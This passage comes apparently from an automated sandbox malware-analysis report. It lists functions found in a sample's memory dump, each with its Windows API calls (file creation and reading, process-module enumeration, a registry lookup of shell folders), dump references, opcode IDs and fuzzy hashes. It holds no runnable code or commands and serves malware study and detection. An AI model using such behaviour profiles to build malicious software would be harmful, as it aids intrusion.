                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                              Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$FileModuleName
                                                                              • String ID:
                                                                              • API String ID: 3859505661-0
                                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                              Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                              Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0040A325
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                              Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                              • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                              Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                              Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                              Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??3@
                                                                              • String ID:
                                                                              • API String ID: 613200358-0
                                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                              Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                              Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnumResourceNamesW.KERNEL32(?,?,004148B6,00000000), ref: 0041494B
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: EnumNamesResource
                                                                              • String ID:
                                                                              • API String ID: 3334572018-0
                                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                              Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                              Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CloseFind
                                                                              • String ID:
                                                                              • API String ID: 1863332320-0
                                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                              Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                              Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                              Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                              • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                              Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004095FC
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 3655998216-0
                                                                              • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                              • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                              Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00445426
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                              • String ID:
                                                                              • API String ID: 1828521557-0
                                                                              • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                              • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                              Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                              • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@FilePointermemcpy
                                                                              • String ID:
                                                                              • API String ID: 609303285-0
                                                                              • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                              • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                              • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                              • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                              Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp
                                                                              • String ID:
                                                                              • API String ID: 2081463915-0
                                                                              • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                              • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                              Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              Memory Dump Source
